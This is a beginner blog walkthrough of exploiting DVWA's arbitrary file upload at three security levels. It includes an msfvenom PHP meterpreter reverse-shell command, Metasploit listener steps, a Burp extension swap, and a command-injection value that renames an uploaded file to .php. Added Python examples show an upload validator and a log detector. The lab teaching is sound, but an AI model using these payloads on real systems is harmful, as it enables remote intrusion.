
ARBITRARY FILE UPLOAD VULNERABILITY AT VARIOUS SECURITY LEVELS

Good Afternoon all,

DVWA – DAMN VULNERABLE WEB APPLICATION.

Some of you know DVWA well, but this one is especially for beginners in cyber security; it may help someone who is looking for an arbitrary file upload tutorial or blogs on the subject.

You can download the DVWA package from their website and host it on your localhost using XAMPP or LAMPP, but here I am using it as a virtual machine which I downloaded from Vulhub, because XAMPP is throwing some serious errors in my face, that’s why. Just kidding, it needs configuration to work, so I went with this to make it easier for those who need it.

REQUIREMENTS: Kali Linux machine, vulnerable machine. (You can install it with XAMPP on Windows too.)

You can download the OVA machine here. This machine has more vulnerable web applications to work on, and we can try those too in the future.

Okay, let’s get back to today’s blog. Today we will go through how to upload a file in DVWA at three levels of security: Low, Medium, and High.

Security Level : LOW

Launch the vulnerable machine and log in with Username = tux, Password = password. The root user doesn’t have access to the Chromium browser on that machine, so log in as the tux user.

Open the Chromium browser and you will see a lot of vulnerable machines along with DVWA, as in the image shown below.

Click Damn Vulnerable Web App and you will get the login page for DVWA.

Log in with Username = admin and Password = password.

Now you will have the DVWA home page. Next we need to set the security level of the application to low, so go to the DVWA Security option in the left panel, change the level to low in the drop-down list, then click Submit.

Now it’s all set to go. Click the File Upload option in the left panel, leave this machine running in the background, then switch to the Kali machine to make the payload and a listener.

To create a payload, use this command: msfvenom -p php/meterpreter/reverse_tcp LHOST=(kali IP) LPORT=(KALI port) -f Raw > /root/Desktop/test.php.

Here I am using msfvenom to create a PHP payload, because the web application uses PHP and so it is easier to execute the payload there, with meterpreter over a reverse_tcp connection. I used the Kali IP and port as the listening IP and port, then saved the file as test.php on the Desktop.

Now we need to transfer the file to the victim machine, so I will use the Apache service in Kali to share it with the victim machine by running the service apache2 start command. (NOTE: Both machines should be on the same network.)

To share the payload file with the victim machine, copy it and paste it into this location: /var/www/html/.

Now we need to access the Kali files from the victim’s machine by using the Kali Linux IP in the URL; then we can download it easily.

Sometimes we can’t upload a file with the php extension, so we need to change the extension using upper and lowercase letters, like Php. Choose the payload file that we need to upload and click Upload.

Copy down the uploaded file’s location so we can execute that file from the URL.

Now switch to the Kali Linux machine to set up a listener with the Metasploit Framework. Type msfconsole in a terminal and wait for it to open.

Setting Up a Listener in METASPLOIT

Use the commands below to set up a listener:

use exploit/multi/handler: this is a wild card handler to set up a listener.

set payload php/meterpreter/reverse_tcp: this is the payload type we created our payload with in msfvenom.

show options: we need to set the required options before exploiting.

Then set LHOST “KALI IP” and set LPORT “Kali Port”. This is mainly for getting the reverse connection from the victim machine.

Next, type exploit and hit Enter, and it starts listening for the reverse connection.

Now switch to the victim machine, then use the copied upload path like this in the URL to execute it.

Now you can see that a meterpreter session has opened on the Kali machine. You have the shell, so now you can do post-exploitation and blah blah!

Security Level : MEDIUM

At this security level we can’t upload files like PHP and other document files; it only accepts image files like .jpeg and .png, so we need to change the extension of test.php to test.jpeg by renaming it.

After that, we need to open Burp Suite from the Application icon at the bottom, then Internet -> Burp suite free edition. We will intercept the request and change the extension of the file from .jpeg to .php in transit, then execute it at the end.

Then set the browser’s proxy to go through Burp Suite by clicking the circular icon next to the URL bar and changing it to Burp. Next, choose the file to upload, switch on the proxy, then click the Upload button to intercept, as in the image shown below.

In the above image you can clearly see the file name test.php; I changed it from .jpeg to php. Then click the Forward button to forward the packet.

We don’t need to set up another listener since our payload is the same, but check your IP to make sure it has not changed. If it has changed, you can change the IP in Burp Suite as well while intercepting.

Close that meterpreter session, check the options, then run exploit again for the Medium security level.

Once it is waiting for a connection, switch to the victim machine. Since we already intercepted the request and changed the extension, we can simply use the upload location path in the URL to execute it, the same as at the LOW security level.

Check for the meterpreter shell on the Linux machine.

In the above image I had to change my IP because it changed in the middle due to some interruptions.
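The Low and Medium bypasses above both succeed because the server decides on values the client controls: the spelling of the extension, and the filename and type sent in the request. The following is an added example in Python, not DVWA's code and not part of the original post, of a server-side check that relies on neither; the function names, the allowlist and the sample inputs are assumptions constructed for illustration.

```python
import os
import secrets

# Assumed allowlist: extension -> leading magic bytes of that image format.
ALLOWED = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
}


def validate_upload(client_filename, client_content_type, data):
    """Return (ok, reason). Only server-side observations are trusted."""
    # Strip any path component, then compare the extension case-insensitively
    # so "test.Php" and "test.PHP" are treated exactly like "test.php".
    base = os.path.basename(client_filename.replace("\\", "/"))
    _, dot, ext = base.rpartition(".")
    ext = ext.lower() if dot else ""
    if ext not in ALLOWED:
        return False, "extension %r not in allowlist" % ext
    # client_content_type is deliberately ignored: it is a request header and
    # can be rewritten in an intercepting proxy just like the filename.
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match declared image type"
    return True, "ok"


def stored_name(client_filename):
    """Server-generated name: random stem plus an allowlisted extension only."""
    ext = client_filename.rpartition(".")[2].lower()
    if ext not in ALLOWED:
        raise ValueError("refusing to store non-allowlisted extension")
    return secrets.token_hex(16) + "." + ext


# Constructed sample inputs (not captured traffic).
PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SCRIPT = b"<?php /* placeholder */ ?>"

if __name__ == "__main__":
    cases = [
        ("test.Php", "image/jpeg", SCRIPT),   # case variation of the extension
        ("test.php", "image/jpeg", SCRIPT),   # name changed back in transit
        ("test.jpeg", "image/jpeg", SCRIPT),  # script renamed to an image
        ("photo.png", "image/png", PNG),      # genuine image
    ]
    for name, ctype, body in cases:
        print(name, validate_upload(name, ctype, body))
```

Magic bytes only show that the file starts like an image, so the accepted file should still be stored under stored_name() in a directory the web server is configured not to execute scripts from.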

Security Level : HIGH

This level is easy, with a bit of complication. We cannot intercept and change the data as in the Medium level, so we need to take another path.

Ok, now we will upload the file as a .jpeg file and click Upload. Once it is uploaded, we need to click Command Injection in the left panel; we will be using another vulnerability to do this one.

In the Enter an IP address field, type 127.0.0.1 | ls -l (copied path of uploaded file), here [../../hackable/uploads/].

It will list the files in that location.

Now it’s clear that the file is uploaded there, so we will rename it in place with the mv command, using 127.0.0.1 | mv ../../hackable/uploads/high.jpeg [space] ../../hackable/uploads/high.php. Now the file is renamed to high.php and we can execute it from the URL.

Same as in the last two levels, close the previous meterpreter sessions and wait for the new one, and check the listening IP too.

Then check for the meterpreter session on the Kali machine.
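Seen from the server, all three levels end the same way: a request for a script-extension file under the upload directory. The added example below (Python, not part of the original post) flags that pattern in web-server access logs; the log lines are constructed, and the Apache combined log format, the upload-form URL and the /dvwa/ prefix are assumptions.

```python
import re
from urllib.parse import unquote

# Apache "combined" access-log format is assumed; only needed fields are named.
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
UPLOAD_DIR = "/hackable/uploads/"        # upload directory named in the post
UPLOAD_FORM = "/vulnerabilities/upload"  # assumed URL of the upload form
# Extensions a PHP-enabled server may execute; matched case-insensitively.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)


def find_script_hits(lines):
    """Flag requests for script-extension files inside the upload directory."""
    uploaders = set()  # client IPs that have POSTed to the upload form
    alerts = []
    for line in lines:
        m = LINE.match(line)
        if m is None:
            continue  # not an access-log line we understand
        path = unquote(m["path"].split("?", 1)[0])
        if m["method"] == "POST" and UPLOAD_FORM in path:
            uploaders.add(m["ip"])
        if UPLOAD_DIR in path and SCRIPT_EXT.search(path):
            alerts.append({
                "ip": m["ip"],
                "time": m["ts"],
                "path": path,
                "status": m["status"],
                # True when the same client used the upload form earlier.
                "uploaded_first": m["ip"] in uploaders,
            })
    return alerts


# Constructed sample log lines (documentation IP range, invented timestamps).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "POST /dvwa/vulnerabilities/upload/ HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /dvwa/hackable/uploads/test.Php HTTP/1.1" 200 0 "-" "-"',
    '192.0.2.77 - - [01/Jan/2024:10:02:00 +0000] "GET /dvwa/hackable/uploads/photo.png HTTP/1.1" 200 734 "-" "-"',
    '192.0.2.10 - - [01/Jan/2024:10:05:30 +0000] "GET /dvwa/hackable/uploads/high.php HTTP/1.1" 200 0 "-" "-"',
]

if __name__ == "__main__":
    for alert in find_script_hits(SAMPLE):
        print(alert)
```

The last sample line is the High-level case: only an image was ever uploaded, yet a .php file is later requested from the same directory, which is why the rule keys on the request path rather than on what the upload form accepted.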

Voila, everything is done. This task is an easy one, but it needs some out-of-the-box thinking to get past the security level.

That’s it for today, friends. Let’s meet in another blog.

Bye Bye!
